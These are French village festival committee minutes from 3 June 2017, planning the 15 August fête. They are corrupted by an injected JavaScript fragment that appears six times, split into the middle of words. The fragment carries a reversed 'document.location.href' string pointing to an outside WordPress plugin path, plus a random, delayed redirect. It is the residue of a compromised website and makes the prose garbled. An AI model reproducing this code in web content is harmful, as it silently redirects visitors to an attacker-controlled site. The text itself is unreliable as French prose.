15 août 2010 Stand de la lavande

Compte-rendu de la réunion du 3 juin pour la préparation de la Fête du 15 août 2017

La préparation

Comme prévu lors de l’assemblée générale, le samedi 12 à partir de 9 H est réservé à la logistique : mise en place des stands, récolte du buis, décoration, répartition du petit matériel, vérification et installation du réseau électrique…

Un appel est lancé à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toutes les bonnes volontés.

Le jour du 15 août

Les stands seront les mêmes que les autres années : Buvette, sandwiches, frites, gâteaux, lavande, jeux pour les enfants…

A midi chacun pourra apprécier la paella et le soir déguster le méchoui. Il manquera du personnel donc là aussi avis aux  personnes intéressées.

La messe aura lieu en plein air le matin.

Tout le jour le club des Engoulevents proposera des baptêmes en ULM sur l’aérodrome de Saint Martin.

En plus du concours de boules traditionnel un concours de pointage ouvert à toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous sera organisé.

A la toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombée de la nuit sera tiré le magnifique feu d’artifice puis place à la danse soit sous le chapiteau soit dans la salle des fêtes.

Le jour du 16 août

Il faudra ranger et nettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyer. Heureusement le soir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les participants et leur famille sont conviés à un dîner dansant sous le chapiteau pour terminer la fête en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute convivialité.

 

 

Réunion du Comité des fêtes du 3 juin 2017. Compte-rendu